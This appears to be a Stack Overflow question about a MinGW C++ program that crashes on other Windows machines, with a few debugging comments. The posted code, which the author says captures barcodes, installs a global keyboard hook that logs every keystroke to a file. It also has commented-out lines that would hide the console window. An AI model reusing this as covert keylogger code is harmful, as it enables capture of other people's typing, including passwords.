# c++ compiled exe crashes on another machine

Tags: c++, crash, mingw, exe

I have a problem with this code:
i am using mingw and when i compile it using:
g++ helloworld.cpp -o helloworld.exe
it works on the machine that compiled it for hous no problems at all.
but on other machines such as XP Pro it runs the first cout line and crashes
here is the code (this is to capture barcodes not a key logger )

```
 #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <winuser.h>
    #include <iostream>
    #include <time.h>

    using namespace std;

    HHOOK KBDHOOK;
    KBDLLHOOKSTRUCT kbdStruct;
    int endbarcode = 0;


    int Save (int KS)
    {
    time_t rawtime;
    struct tm * timeinfo;
    char buffer[80];

        if ( (KS == 1) || (KS == 2) )
            return 0;

        FILE *OUTPUT_FILE;
        OUTPUT_FILE = fopen("log.txt", "a+");

        cout << KS << endl;

            if(endbarcode == 0)
            {
         time(&rawtime);
                timeinfo = localtime(&rawtime);
                strftime(buffer,80,"%Y-%m-%d %H:%M:%S ",timeinfo);
                puts(buffer);

                endbarcode = 1;
                fprintf(OUTPUT_FILE, "%s", buffer);
            }

            if (KS == 8)
            fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
            else if (KS == 13)
            {
                fprintf(OUTPUT_FILE, "%s", "\n");
                endbarcode = 0;
            }

            else if (KS == 32)
            fprintf(OUTPUT_FILE, "%s", " ");
            else if (KS == VK_TAB)
            fprintf(OUTPUT_FILE, "%s", "[TAB]");
                else if (KS == VK_SHIFT)
            fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
                else if (KS == VK_CONTROL)
            fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
                    else if (KS == VK_ESCAPE)
            fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
                    else if (KS == VK_END)
            fprintf(OUTPUT_FILE, "%s", "[END]");
                        else if (KS == VK_HOME)
            fprintf(OUTPUT_FILE, "%s", "[HOME]");
                        else if (KS == VK_LEFT)
            fprintf(OUTPUT_FILE, "%s", "[LEFT]");
                            else if (KS == VK_UP)
            fprintf(OUTPUT_FILE, "%s", "[UP]");
                            else if (KS == VK_RIGHT)
            fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
                                else if (KS == VK_DOWN)
            fprintf(OUTPUT_FILE, "%s", "[DOWN]");
                                else if (KS == 190 || KS == 110)
            fprintf(OUTPUT_FILE, "%s", ".");
                                else
                                    fprintf(OUTPUT_FILE, "%s", &KS);

    fclose (OUTPUT_FILE);
        return 0;
    }

    LRESULT CALLBACK LowLevelKeyboardPoc(int nCode, WPARAM wParam, LPARAM lParam)
    {
        if(nCode < 0)
            return CallNextHookEx(KBDHOOK, 0, wParam, lParam);

            if(nCode == HC_ACTION)
            {
            if(wParam == WM_KEYDOWN)
                {

            kbdStruct = *((KBDLLHOOKSTRUCT*)lParam);
            printf("%X\t%c\n", (unsigned int)kbdStruct.vkCode, (char)kbdStruct.vkCode);
            Save((unsigned int)kbdStruct.vkCode);
                }

                }


        return CallNextHookEx(KBDHOOK, nCode, wParam, lParam);
    }



    int main()
    {

        cout << "the main method has run" << endl;

       // HWND stelth;
      //  stelth = FindWindowA("ConsoleWindowClass", NULL);
      //  ShowWindow(stelth,0);
    if((KBDHOOK = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardPoc, GetModuleHandle(NULL), 0)) == NULL)
         {
             cout << "The hook NOT installed";
         }
         cout << "hook installed" << endl;
        MSG Message;
    while(GetMessage(&Message, NULL, 0, 0))
    {
    TranslateMessage(&Message);
    DispatchMessage(&Message);
    }
    GetLastError();

    UnhookWindowsHookEx(KBDHOOK);
    return 0;
    }
```

Comment: You should really recompile the code on the target machine (if they are not the same architecture) -- this could be the main culprit here. If that is not the case, did you try and debug this and see which line fails?

Comment: Guess: `fopen()` fails and `OUTPUT_FILE` is `NULL` which causes a crash when used in `fprintf()`?

Comment: @NickolayRatchev if the architectures were different, the program couldn't start at all.

Comment: Run it in a debugger on the machines on which it crashes. This will quicly pinpoint the problem.

Comment: ran it in debugger but everything is fine no problems